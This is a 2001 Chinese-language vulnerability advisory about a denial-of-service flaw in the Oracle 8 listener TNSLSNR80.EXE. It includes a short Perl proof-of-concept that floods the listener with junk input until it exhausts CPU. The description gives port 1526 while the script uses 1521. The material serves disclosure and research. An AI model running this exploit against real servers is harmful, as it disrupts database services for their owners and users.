Oracle 8 Server 'TNSLSNR80.EXE' 拒绝服务攻击
发布日期:2001-04-26
更新日期:2001-04-26
受影响系统:
Oracle Oracle8 8.0x
描述:
BUGTRAQ ID: 2626
Oracle 8存在一个拒绝服务缺陷。攻击者连接TCP/1526端口,发送无效输入,可能导
致"TNSLSNR80.EXE"进程消耗所有可用系统资源,最终服务停止响应。
<* 来源:(
r0ot@runbox.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/local/bin/perl -w
# This little script crashes Oracle 8.0 on Windows NT 4.0 (Sp6)
# TNSLSNR80.EXE will consume 100% CPU...
#
# by r0ot@runbox.com
use IO::Socket;
$host="kickme";
# enter the hostname of the oracle-server to kick
socket(HANDLE, PF_INET, SOCK_STREAM, 6);
connect(HANDLE, sockaddr_in(1521, scalar gethostbyname($host)));
HANDLE->autoflush(1);
sleep(2);
print HANDLE "\n";
for ($i=0; $i<3; $i++) {
sleep(2);
print HANDLE "dfsdffdfsfdggfdgdf";
# an arbitrary, but carefully chosen constant...
}
close(HANDLE);
建议:
厂商补丁:
暂无
浏览次数:4439
严重程度:0(网友投票)